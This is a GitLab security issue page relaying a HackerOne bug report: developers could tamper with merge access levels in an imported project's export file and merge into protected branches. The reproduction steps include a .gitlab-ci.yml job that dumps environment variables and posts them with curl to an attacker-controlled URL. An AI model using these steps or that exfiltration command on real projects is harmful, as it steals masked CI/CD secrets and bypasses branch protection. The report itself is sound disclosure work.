Skip to content
GitLab
Next
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • GitLab GitLab
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 54.9k
    • Issues 54.9k
    • List
    • Boards
    • Service Desk
    • Milestones
    • Iterations
    • Requirements
  • Merge requests 1.5k
    • Merge requests 1.5k
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Package Registry
    • Container Registry
    • Terraform modules
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • GitLab.orgGitLab.org
  • GitLabGitLab
  • Issues
  • #353958
Closed
Open
Issue created Mar 01, 2022 by GitLab SecurityBot@gitlab-securitybotReporter

User with developer role (group) can modify Protected branches -> Allowed to merge setting on imported project

HackerOne report #1485381 by justas_b on 2022-02-18, assigned to @nmalcolm:

Report | Attachments | How To Reproduce

Report

Hello,

Summary

A user with developer role (group) can steal masked group/project CI/CD variables by modifying Project settings -> Protected branches -> Allowed to merge setting on imported project (tree/project/protected_branches.ndjson file).

Steps to reproduce
  1. Create 2 accounts
  2. Create a group with account A and masked CI/CD group variables (Group settings -> CI/CD -> Variables)

secretvar_masked.png

  1. Create a personal project with account B and export it
  2. Invite account B (developer) to account A's (owner) group
  3. With account B, modify the project import file, go to tree/project/protected_branches.ndjson
  4. Change the "merge_access_levels":[{"access_level":}] value to 30 if its 40

merge_access_levels_30.png

  1. Upload the modified project to account A's group with account B
  2. By default, only maintainers are allowed to merge into protected branches ("merge_access_levels":[{"access_level":}] is 40 - 40 = maintainer, 30 = developer, etc.)
  3. Create a new branch with account B (developer)
  4. Add the following .gitlab-ci.yml file to the newly created branch and create a merge request
image: ruby:latest

job_name2:  
 script:  
   - export > test.txt  
   - curl -X POST --data "$(cat test.txt)" (attacker controlled website's url)  

new_branch_malicious_gitlab_ci_yml.png

[REDACTED]

  1. Merge the newly created branch into main (protected) branch (with account B - developer)

merge_to_protected_as_developer.png

  1. A pipeline run against a protected branch will send sensitive data to attackers website using curl

[REDACTED]

The impact is pretty similar to my other report #1256017

What is the current bug behavior?

It is possible to modify the "merge_access_levels":[{"access_level":} value on imported projects

What is the expected correct behavior?

The "merge_access_levels":[{"access_level":} should always be default - 40

Relevant logs and/or screenshots

(Paste any relevant logs - please use code blocks (```) to format console output,
logs, and code as it's very hard to read otherwise.)

Output of checks

This bug happens on GitLab.com

Impact

User with developer role (group) can steal masked group and project CI/CD variables. Developer can also modify main branch without maintainer's permission.

Attachments

How To Reproduce

Please add reproducibility information to this section:

Edited Jun 02, 2022 by Nick Malcolm
Assignee
Assign to
Time tracking